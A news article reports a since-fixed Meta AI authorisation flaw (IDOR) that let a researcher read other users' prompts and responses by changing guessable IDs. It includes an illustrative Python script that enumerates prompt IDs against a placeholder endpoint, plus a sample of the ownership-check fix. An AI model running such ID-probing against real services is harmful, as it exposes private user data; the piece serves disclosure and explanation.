Meta AI reportedly had a vulnerability that could be exploited to access other users' private conversations with the chatbot. Exploiting the bug did not require breaking into Meta's servers or manipulating the app's code; it could be triggered simply by analysing network traffic. As per the report, a researcher found the bug late last year and informed the Menlo Park-based social media giant about it. The company deployed a fix for the issue in January and rewarded the researcher for finding the exploit.
According to a TechCrunch report, the Meta AI vulnerability was discovered by Sandeep Hodkasia, founder of AppSecure, a security testing firm. The researcher reportedly informed Meta about it in December 2024 and received a bug bounty reward of $10,000 (roughly Rs. 8.5 lakh). Meta spokesperson Ryan Daniels told the publication that the issue was fixed in January, and that the company did not find any evidence of the method being used by bad actors.
The vulnerability reportedly lay in how Meta AI handled user prompts on its servers. The researcher told the publication that the AI chatbot assigns a unique ID to every prompt and its AI-generated response whenever a logged-in user edits a prompt to regenerate an image or text. Editing prompts is a very common action, as most people conversationally refine their requests to get a better response or a desired image.
Hodkasia reportedly found that he could see this unique number by analysing his browser's network traffic while editing an AI prompt. Then, by changing the number, he could access someone else's prompt and its corresponding AI response, the report claimed. The researcher said that these numbers were "easily guessable" and that finding another legitimate ID did not take much effort.
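To make the attack pattern concrete, here is a minimal sketch of the ID-probing technique described above. The endpoint URL, parameter name, token, and ID values are all hypothetical placeholders for illustration; Meta's actual internal API has not been published.

```python
# Hypothetical sketch of probing sequential prompt IDs over HTTP.
# The endpoint, parameter name, and ID format are illustrative
# assumptions, not Meta's real API.
import requests

BASE_URL = "https://chatbot.example/api/prompt"  # placeholder endpoint
session = requests.Session()
# The attacker is an ordinary logged-in user; this token is their own.
session.headers["Authorization"] = "Bearer ATTACKER_OWN_TOKEN"

own_id = 4815162342  # ID observed in the attacker's own browser traffic

# Because the IDs were "easily guessable", simply stepping through
# nearby values could land on other users' prompt/response pairs.
for candidate in range(own_id - 5, own_id + 6):
    resp = session.get(BASE_URL, params={"prompt_id": candidate})
    if resp.ok:
        # On an unpatched server, this would return someone else's
        # prompt and AI response.
        print(candidate, resp.json())
```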
Essentially, the vulnerability lay in how the AI system handled authorisation for these unique IDs: the servers did not check whether the person requesting a prompt was the user who had created it, a pattern security researchers call an insecure direct object reference (IDOR). In the hands of a bad actor, this method could have exposed a large amount of users' private data.
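Meta's actual fix has not been published, but the generic remedy for this class of bug is a server-side ownership check. Below is a minimal, self-contained sketch using an in-memory store and invented names, contrasting the flawed lookup with a corrected one; it illustrates the pattern, not Meta's code.

```python
# Illustrative sketch of the authorisation gap, with an in-memory
# store standing in for the real service. All names are invented.
PROMPTS = {
    1001: {"owner": "alice", "text": "draft my resignation letter"},
    1002: {"owner": "bob", "text": "summarise my medical report"},
}

def fetch_prompt_vulnerable(prompt_id: int, requesting_user: str) -> dict:
    # Flawed pattern: knowing the ID is treated as proof of access.
    return PROMPTS[prompt_id]

def fetch_prompt_fixed(prompt_id: int, requesting_user: str) -> dict:
    # Correct pattern: verify the record belongs to the requester.
    record = PROMPTS[prompt_id]
    if record["owner"] != requesting_user:
        raise PermissionError("prompt does not belong to this user")
    return record

# "alice" can read "bob"'s prompt through the vulnerable path...
print(fetch_prompt_vulnerable(1002, "alice"))

# ...but the fixed path rejects the same request.
try:
    fetch_prompt_fixed(1002, "alice")
except PermissionError as err:
    print("blocked:", err)
```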
Notably, a report last month found that the Meta AI app's discover feed was filled with posts that appeared to be private conversations with the chatbot. These messages included requests for medical and legal advice, and even confessions to crimes. Later in June, the company began showing a warning message to dissuade people from unknowingly sharing their conversations.